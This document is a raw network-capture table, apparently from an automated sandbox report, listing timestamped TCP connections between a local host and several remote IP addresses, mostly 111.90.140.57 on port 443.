Jan 13, 2025 15:28:20.762325048 CET	443	49723	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:20.763484955 CET	443	49723	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:20.763824940 CET	49723	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:20.763947010 CET	443	49723	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:20.764158010 CET	49723	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:20.807413101 CET	443	49723	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:20.810790062 CET	49723	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:21.176815987 CET	49680	80	192.168.2.16	192.229.211.108
Jan 13, 2025 15:28:21.359337091 CET	49724	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:21.359390020 CET	443	49724	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:21.359524012 CET	49724	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:21.359814882 CET	49724	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:21.359829903 CET	443	49724	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:21.845046043 CET	443	49723	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:21.845134974 CET	443	49723	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:21.845158100 CET	443	49723	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:21.845196962 CET	49723	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:21.845218897 CET	443	49723	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:21.845238924 CET	49723	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:21.845330000 CET	443	49723	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:21.845387936 CET	49723	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:21.846200943 CET	49723	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:21.846215963 CET	443	49723	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:21.895400047 CET	49725	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:21.895452023 CET	443	49725	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:21.895544052 CET	49725	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:21.895783901 CET	49725	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:21.895821095 CET	443	49725	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:22.305077076 CET	443	49724	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:22.305413961 CET	49724	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:22.305427074 CET	443	49724	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:22.305777073 CET	443	49724	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:22.306077003 CET	49724	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:22.306139946 CET	443	49724	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:22.306255102 CET	49724	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:22.347331047 CET	443	49724	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:22.356794119 CET	49724	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:22.388789892 CET	49680	80	192.168.2.16	192.229.211.108
Jan 13, 2025 15:28:22.851048946 CET	443	49725	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:22.851353884 CET	49725	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:22.851418972 CET	443	49725	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:22.854525089 CET	443	49725	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:22.854608059 CET	49725	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:22.854938984 CET	49725	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:22.855030060 CET	443	49725	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:22.855144978 CET	49725	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:22.895328999 CET	443	49725	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:22.900810957 CET	49725	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:22.900829077 CET	443	49725	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:22.947807074 CET	49725	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:24.279459953 CET	443	49725	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:24.279524088 CET	443	49725	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:24.279546976 CET	443	49725	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:24.279568911 CET	443	49725	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:24.279629946 CET	49725	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:24.279629946 CET	49725	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:24.279701948 CET	443	49725	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:24.279742002 CET	443	49725	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:24.279818058 CET	49725	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:24.280541897 CET	49725	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:24.280570030 CET	443	49725	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:24.799814939 CET	49680	80	192.168.2.16	192.229.211.108
Jan 13, 2025 15:28:25.134799957 CET	49678	443	192.168.2.16	20.189.173.10
Jan 13, 2025 15:28:25.721190929 CET	443	49719	216.58.206.36	192.168.2.16
Jan 13, 2025 15:28:25.721359968 CET	443	49719	216.58.206.36	192.168.2.16
Jan 13, 2025 15:28:25.721458912 CET	49719	443	192.168.2.16	216.58.206.36
Jan 13, 2025 15:28:26.536501884 CET	443	49724	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:26.536647081 CET	443	49724	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:26.536714077 CET	49724	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:26.546462059 CET	49724	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:26.546475887 CET	443	49724	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:26.548434019 CET	49719	443	192.168.2.16	216.58.206.36
Jan 13, 2025 15:28:26.548469067 CET	443	49719	216.58.206.36	192.168.2.16
Jan 13, 2025 15:28:26.550110102 CET	49726	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:26.550133944 CET	443	49726	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:26.550200939 CET	49726	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:26.550407887 CET	49726	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:26.550415039 CET	443	49726	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:26.588789940 CET	49673	443	192.168.2.16	204.79.197.203
Jan 13, 2025 15:28:27.484194040 CET	443	49726	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:27.484467030 CET	49726	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:27.484478951 CET	443	49726	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:27.484944105 CET	443	49726	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:27.485291958 CET	49726	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:27.485373974 CET	443	49726	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:27.485460997 CET	49726	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:27.527338982 CET	443	49726	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:28.041538000 CET	443	49726	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:28.041729927 CET	443	49726	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:28.041801929 CET	49726	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:28.041996956 CET	49726	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:28.042026043 CET	443	49726	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:28.042035103 CET	49726	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:28.042279959 CET	49726	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:28.044348955 CET	49727	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:28.044414043 CET	443	49727	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:28.044498920 CET	49727	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:28.044707060 CET	49727	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:28.044722080 CET	443	49727	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:28.958843946 CET	443	49727	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:28.960691929 CET	49727	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:28.960761070 CET	443	49727	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:28.961893082 CET	443	49727	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:28.962716103 CET	49727	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:28.962865114 CET	49727	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:28.962878942 CET	443	49727	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:28.962908030 CET	443	49727	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:29.013842106 CET	49727	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:29.510957956 CET	443	49727	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:29.511142969 CET	443	49727	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:29.511202097 CET	49727	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:29.512658119 CET	49727	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:29.512680054 CET	443	49727	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:29.512696028 CET	49727	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:29.512721062 CET	49727	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:29.513674021 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:29.513695002 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:29.513767958 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:29.513978958 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:29.513997078 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:29.604851007 CET	49680	80	192.168.2.16	192.229.211.108
Jan 13, 2025 15:28:30.445715904 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:30.446147919 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:30.446213961 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:30.447412014 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:30.447724104 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:30.447854996 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:30.447870970 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:30.447911978 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:30.499831915 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.362492085 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.362554073 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.362576008 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.362593889 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.362651110 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.362726927 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.362771988 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.407242060 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.407265902 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.455816031 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.591176987 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.591213942 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.591245890 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.591402054 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.591402054 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.591439009 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.591782093 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.591809988 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.591829062 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.591861963 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.591892004 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.591907978 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.592757940 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.592786074 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.592817068 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.592833042 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.592852116 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.592868090 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.592890024 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.593641996 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.593677998 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.593714952 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.593739033 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.593753099 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.646868944 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.818872929 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.818912983 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.818931103 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.819051027 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.819120884 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.819149017 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.819391012 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.819411993 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.819483995 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.819484949 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.819504976 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.819761038 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.819818020 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.819972038 CET	49728	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.819998980 CET	443	49728	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.867182016 CET	49730	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.867230892 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:31.867368937 CET	49730	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.867870092 CET	49730	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:31.867904902 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:32.776742935 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:32.777040958 CET	49730	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:32.777107954 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:32.777615070 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:32.777977943 CET	49730	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:32.778022051 CET	49730	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:32.778037071 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:32.778073072 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:32.824876070 CET	49730	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:34.136610985 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:34.136635065 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:34.136641979 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:34.136838913 CET	49730	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:34.136874914 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:34.190908909 CET	49730	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:34.364144087 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:34.364155054 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:34.364173889 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:34.364217043 CET	49730	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:34.364265919 CET	49730	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:34.364509106 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:34.364516020 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:34.364533901 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:34.364569902 CET	49730	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:34.364593983 CET	49730	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:34.365438938 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:34.365444899 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:34.365520000 CET	49730	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:34.366199017 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:34.366204977 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:34.366266966 CET	49730	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:34.592350006 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:34.592365980 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:34.592457056 CET	49730	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:34.592690945 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:34.592756033 CET	49730	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:34.593127966 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:34.593302965 CET	443	49730	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:34.593374014 CET	49730	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:34.593374014 CET	49730	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:34.593420982 CET	49730	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:34.743894100 CET	49678	443	192.168.2.16	20.189.173.10
Jan 13, 2025 15:28:39.209821939 CET	49680	80	192.168.2.16	192.229.211.108
Jan 13, 2025 15:28:44.891244888 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:44.891309977 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:44.891360044 CET	49733	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:44.891388893 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:44.891395092 CET	443	49733	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:44.891448975 CET	49733	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:44.891673088 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:44.891701937 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:44.891801119 CET	49733	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:44.891812086 CET	443	49733	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:45.802599907 CET	443	49733	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:45.802922964 CET	49733	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:45.802937031 CET	443	49733	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:45.803601980 CET	443	49733	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:45.803884983 CET	49733	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:45.803968906 CET	443	49733	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:45.804200888 CET	49733	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:45.826553106 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:45.826936007 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:45.826966047 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:45.827482939 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:45.827925920 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:45.828001976 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:45.851355076 CET	443	49733	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:45.875812054 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:51.789532900 CET	443	49733	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:51.789724112 CET	443	49733	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:51.789799929 CET	49733	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:51.791095972 CET	49733	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:51.791110992 CET	443	49733	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:51.791119099 CET	49733	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:51.791162968 CET	49733	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:51.791845083 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:51.835331917 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.087006092 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.087069035 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.087089062 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.087127924 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.087143898 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.087171078 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.133794069 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.133809090 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.181829929 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.320421934 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.320456982 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.320473909 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.320674896 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.320674896 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.320699930 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.320925951 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.320945978 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.320969105 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.320980072 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.321000099 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.321021080 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.321021080 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.322417974 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.322437048 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.322483063 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.322488070 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.322504997 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.323004961 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.323040962 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.323069096 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.323084116 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.323100090 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.371932030 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.371952057 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.419929981 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.552340984 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.552380085 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.552397966 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.552553892 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.552553892 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.552588940 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.554564953 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.554584980 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.554605007 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.554624081 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.554630995 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.554655075 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.554904938 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.554961920 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.555123091 CET	49732	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.555135012 CET	443	49732	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.560488939 CET	49734	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.560513020 CET	443	49734	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:53.560587883 CET	49734	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.560772896 CET	49734	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:53.560786009 CET	443	49734	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:54.477334976 CET	443	49734	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:54.477654934 CET	49734	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:54.477672100 CET	443	49734	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:54.478750944 CET	443	49734	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:54.479051113 CET	49734	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:54.479193926 CET	49734	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:54.479196072 CET	443	49734	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:54.519339085 CET	443	49734	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:54.521940947 CET	49734	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:55.034259081 CET	443	49734	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:55.034327984 CET	443	49734	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:55.034348965 CET	443	49734	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:55.034603119 CET	49734	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:55.034603119 CET	49734	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:55.034636021 CET	443	49734	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:55.079819918 CET	49734	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:55.284975052 CET	443	49734	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:55.284982920 CET	443	49734	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:55.285007954 CET	443	49734	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:55.285059929 CET	49734	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:55.285063028 CET	443	49734	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:55.285070896 CET	443	49734	111.90.140.57	192.168.2.16
